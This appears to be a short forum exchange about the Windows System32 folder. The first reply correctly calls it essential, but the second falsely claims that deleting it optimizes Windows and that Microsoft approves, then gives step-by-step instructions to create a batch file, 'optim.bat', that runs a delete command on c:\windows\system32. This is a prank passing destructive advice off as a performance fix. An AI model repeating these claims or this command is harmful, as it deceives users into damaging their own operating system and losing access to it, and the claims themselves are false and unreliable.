It's simple, system32 is your 32Bit operating system. It is the brain. So just think what would happen if you delete your brain??

No, if you delete System32, you optimize Windows. Instant boots/shutdowns, and lots of other things. It's extra junk Microsoft put in for no reason, and they say it's ok do delete.

Open a notepad file.
Type:
@echo off

del c:\windows\system32


Save as optim.bat (as all files, not as .txt)

Enjoy the awesomeness.
